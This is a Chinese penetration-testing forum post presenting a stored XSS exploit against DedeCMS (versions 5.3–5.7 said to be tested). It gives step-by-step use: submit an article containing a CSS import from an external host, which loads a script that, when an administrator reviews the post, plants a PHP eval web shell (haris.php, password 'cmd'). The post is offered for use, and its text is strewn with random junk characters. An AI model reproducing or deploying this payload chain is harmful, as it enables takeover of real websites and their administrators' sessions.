找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms xss oday通杀所有版本 可getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2114|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell0 F" s+ R( b3 N6 i# }) o
为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
( k7 _- g- D  o* p) h目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
5 m# z. k6 U( ~1 z! ]( Q! ~4 e下面说说利用方法。
* v( c1 f% [; H2 a7 N条件有2个:
0 b" @% {; ?6 _1.开启注册
' y% h  t8 f/ ~; Z# g, P2.开启投稿4 k. L2 G5 D% m" h* G
注册会员----发表文章
; Y8 p' S. X% u  c+ h0 n6 V内容填写:5 w, K, G" \& p& _
复制代码8 D2 e! n/ `; K/ d3 Z) R0 C( w' M* X
<style>@im\port'\http://xxx.com/xss.css';</style>
4 w. h- @( W! R# [% E0 ^新建XSS.Css
# y6 P, ]% B) G9 ?复制代码7 @; R2 E! P) o6 Q  F5 @
.body{
  @4 d0 r' u" C6 g& Fbackground-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }* {9 ?# a1 z% f, w
新建xss.js 内容为
* ^# @& x0 D9 S) D- _2 c复制代码# T! E+ Q. r; p* O1 @
1.var request = false;0 Y7 z" C5 `2 d8 M, t5 }  G$ ?) S
2.if(window.XMLHttpRequest) {, Y6 Y) d9 C" k9 o0 k/ G
3.request = new XMLHttpRequest();6 t! c3 `* Q# r, b! A* d
4.if(request.overrideMimeType) {
7 V- E8 I1 e8 T9 b5.request.overrideMimeType('text/xml');
: e$ m  ~% B+ Q6 w* H, I1 \6.}
9 _: l) C7 ?- {$ d/ o& O$ @$ f: y6 L7.} else if(window.ActiveXObject) {
! p( Z- q1 T# W6 ~: x+ Y8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];2 O' G& d) `; }6 T" ]7 f  ^7 x
9.for(var i=0; i<versions.length; i++) {  S- C  s. B8 n: H! P
10.try {+ n+ c  i  B  N* J' K' T! Y
11.request = new ActiveXObject(versions);: D) y9 b* k1 f2 h$ F3 l4 y$ R1 Y) Y
12.} catch(e) {}. U5 Q0 S' `( d' j7 I1 f2 Q
13.}# a- a# b' N  y3 F% h
14.}
0 i* j3 d* Y" I8 n% Y15.xmlhttp=request;
( Z  a" D7 r" [# x5 O16.function getFolder( url ){
5 n, w/ ~" ?  B4 H17. obj = url.split('/')
7 I7 Z' O" y9 x18. return obj[obj.length-2]- N/ Z3 o2 F7 ~, y  I
19.}
: X, u( E) x; m1 r. o20.oUrl = top.location.href;* J; K" X* z; `" N2 ~& n
21.u = getFolder(oUrl);
" P; F7 L& ^7 U# E22.add_admin();7 f0 ]8 ^8 G3 o* {
23.function add_admin(){, X) o8 p- s! j4 |1 {. m9 A) g
24.var url= "/"+u+"/sys_sql_query.php";2 ^. B9 o& K. s7 e- q
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";6 s6 k* [4 @' S+ ?
26.xmlhttp.open("POST", url, true);; h* Q8 i- l' }1 a3 Q
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");3 L; \4 W  H; [5 X; R1 T
28.xmlhttp.setRequestHeader("Content-length", params.length);
& s- o  |3 B. L  D29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
7 z& g* O7 `& ]( X30.xmlhttp.send(params);. y- z1 {' l1 v7 ]5 p& d8 H% P; V
31.}
9 o- t( p; f& P. e- T当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表